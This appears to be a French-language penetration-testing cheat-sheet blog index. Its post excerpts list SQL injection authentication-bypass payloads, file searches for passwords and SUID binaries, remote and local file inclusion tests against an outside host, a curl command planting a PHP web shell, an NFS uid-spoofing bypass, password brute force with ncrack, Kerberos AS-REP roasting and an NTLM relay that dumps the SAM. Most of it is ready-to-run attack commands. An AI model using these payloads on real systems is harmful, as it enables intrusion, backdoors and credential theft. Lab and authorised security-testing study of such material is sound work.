Injection SQL

Payloads ‘ )’ “ ` ‘) “) `) ‘)) “)) `)) -SLEEP(30); # Contournement de la vérification de mots de passe ‘ or 1=1 — ‘ or ‘1’=1 ‘ or 1=1 –+ user’ or 1=1;# user’ or 1=1 LIMIT 1;# user’ or 1=1 LIMIT 0,1;# Injections basés sur les unions SQL order by 1 UNION … Continuer la lecture

Crack de mots de passe en ligne

Il existe bien évidemment des utilitaires comme John the Ripper et Hashcat, mais des sites web ont déjà les hashes crackés de millions de passe. Il vaut la peine de tenter sa chance dans l’espoir de trouver la solution rapidement avant d’essayer soi-même. Voici donc une liste de sites web avec les protocoles supportés https://crackstation.net … Continuer la lecture

Trouver des fichiers sous Linux

find / -name "secret.txt" locate secret.txt (voir updatedb) essaie de trouver une chaîne de caractères dans plusieurs fichiers strings *.txt | grep password grep -l -i pass /var/log/*.log 2>/dev/null find / -maxdepth 10 -name *.conf -type f | grep -Hn pass; 2>/dev/null trouver des fichiers SUID find / -perm /4000 -type f 2>/dev/null find / … Continuer la lecture

Stéganographie

La stéganographie permet de cacher un fichier dans un autre fichier (wav,jpg). Pour se faire, un utilitaire existe et permet aussi d’encrypter le fichier : steghide steghide embed -cf photo.jpeg -ef tohide.txt steghide extract -sf ./photo.jpeg inary steghide info ./photo.jpeg Exiftool permet d’avoir l’information sur l’emplacement exiftool somephoto.png : permet d’avoir de l’information : lieu … Continuer la lecture

Test pour des vulnérabilités d’inclusion de fichiers

#Exploitation de RFI GET /blog/?lang=http://10.10.14.11/test.php #va échouer si l'inclusion de fichiers sur d'autres serveurs n'est pas permise GET /blog/?lang=//10.10.14.11/test/test.php #un chemin UNC est considéré local ## LFI, RFI, RCE uniscan -u http://192.168.44.134:10000/ -qweds ### Test for LFI # Harvest links from a page (to test for LFI) fimap -H -u “http://192.168.56.129” -d 3 -w /tmp/urllist … Continuer la lecture

Backdoor HTTP

# créer aun fichier.php dans le répertoire /test avec curl. curl -X PUT -d '<?php system($_GET["c"]);' http://192.168.56.103/test/1.php # téléverser un backdoor avec curl curl -X POST -F "file=@/file/location/shell.php" http://192.168.2.2/upload.php #téléverser en utilisant un formulaire web curl -F "field=<shell.zip" http://192.168.2.3/upld.php -F 'k=v' –cookie "k=v;" -F "submit=true" -L -v # téléversement avec cadaver cadaver http://192.168.2.22/dav/ put /home/germain/shell.php

Contournement de la sécurité NFS

showmount -e 192.168.2.64 mkdir /mnt/nfs mount -t nfs -o vers=3 192.168.2.64:/nfspath /mnt/nfs ls -ld /mnt/nfs (indique que les propriétaires sont uid=2008 et gid=2008 et la permission d'y accéder est interdite. nfs v4 montre le uid et gid de nobody) groupadd –gid 2008 vulnix_group useradd –uid 2008 –groups vulnix_group vulnix_user sudo -u vulnix_user ls -l /mnt/nfs … Continuer la lecture

Intrusion avec la force brute

Essayer les mots de passe du fichier rockyou.txt pour se connecter au partage ncrack -u username -P rockyou.txt -T 5 192.168.2.2 -p smb -v Se créer un dictionnaire de mots de passe avec le mots-clés d’un site internet cewl -d 2 -m 5 -w mylist.txt https://www.searchevolution.com Se créer un dictionnaire personnalisé pour un usager (mots … Continuer la lecture

ActiveDirectory (AD)

Utiliser SharpHound pour obtenir de l’information et importer dans BloodHound pour analyse. Télécharger PingCastle de pingcastle.com pour générer des rapports Obtenir une liste d’utilisateurs d’active directory smbclient -L \\\\10.10.10.10 ls smbclient -L \\\\10.10.10.10\profile$ ls #permet d'obtenir une liste d'utilisateurs GetNPUsers.py mydomain.local/ -usersfile wordlist -format john -output hashes.txt -dc-ip 10.10.10.10 #kerberos attack from impacket john –wordlist=rockyou.txt … Continuer la lecture

NTLM Relay

Vulnérable si la signature des messages est désactivé # nmap -n -Pn -p 445 –script smb-security-mode 192.168.2.0/24 Désactiver SMB et HTTP dans Responder.conf et démarrer Responder # python2 Responder.py -I eth0 -r -d -w Créer un relai vers le serveur cible avec ntlmrelayx (impacket tools) et extraire le fichier SAM # ./ntlmrelayx.py -smb2support -t smb://192.168.2.64 … Continuer la lecture